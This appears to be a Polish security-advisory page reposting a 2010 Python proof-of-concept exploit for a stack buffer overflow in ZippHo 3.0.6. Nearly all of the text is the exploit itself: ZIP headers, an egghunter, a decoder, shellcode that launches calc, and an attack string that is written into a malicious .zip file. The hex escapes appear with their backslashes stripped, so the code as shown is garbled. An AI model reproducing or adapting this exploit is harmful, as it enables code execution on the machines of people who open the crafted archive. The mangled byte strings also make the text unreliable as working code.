Bezpieczeństwo informacji

  Historia :
[2010-03-20] Publikacja

  Podatne oprogramowanie :  

ZippHo 3.0.6

  Tekst :  

#!/usr/bin/python
# #######################################################################
# ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit
# Author: mr_me - http://net-ninja.net/ & http://twitter.com/StevenSeeley
# Download: http://www.brothersoft.com/zippho-71295.html
# Platform: Windows XP sp3 En
# Greetz to: Corelan Security Team & fl0 fl0w
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #######################################################################
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may
cause.

print
"|------------------------------------------------------------------|"
print "| __ __
|"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___
|"
print "| / ___/ __ / ___/ _ / / __ `/ __ / __/ _ / __ `/ __ `__ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / /
|"
print "| ___/____/_/ ___/_/__,_/_/ /_/ __/___/__,_/_/ /_/ /_/ |"
print "|
|"
print "| http://www.corelan.be:8800
|"
print "| security@corelan.be
|"
print "|
|"
print "|-------------------------------------------------[ EIP Hunters
]--|"
print "[+] ZippHo 3.0.6 (.zip) 0day stack buffer overflow PoC exploit"

# local file header
lf_header = ("x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00xe4x0fx00x00x00")

# central directory file header
cdf_header = ("x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00"
"x00x00x00x00x00x00x00x00x00xe4x0fx00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")

# end of central directory record
efcdr_record = ("x50x4Bx05x06x00x00x00x00x01x00x01x00"
"x12x10x00x00x02x10x00x00x00x00")

# asci egghunter
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA")

# encoded calc
calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41")

# custom decoder
decoder = ("x25x4Ax4Dx4Ex55"
"x25x35x32x31x2Ax2dx55x55"
"x55x5fx2dx56x55x56x5fx2d"
"x55x55x55x5ex50x25x4Ax4D"
"x4Ex55x25x35x32x31x2Ax2d"
"x2bx6ax32x53x2dx2ax6ax31"
"x54x2dx2ax69x31x54x50")

# attack string
exploit = "x43" * 10
exploit += egghunter
exploit += "x41" * (221-len(exploit))
exploit += "x61"
exploit += "x53"
exploit += "x5c"
exploit += decoder
exploit += "x41" * (292-len(exploit))
exploit += "x73xf9x41x41"
exploit += "x70x54x54x00"
exploit += "x57x30x30x54"
exploit += "x57x30x30x54"
# I have no eyes, I make the flash of lightning my eyes ~ samurai creed.
exploit += calc
exploit += "x41" * (4064-len(exploit))
exploit += "x2ex74x78x74"
print "[+] Writing attack string to file.."
mefile = open('cst-zippho.zip','w')
mefile.write(lf_header + exploit + efcdr_record + exploit + efcdr_record)
mefile.close()
print "[+] Created cst-zippho.zip!"

  Referencje :  

None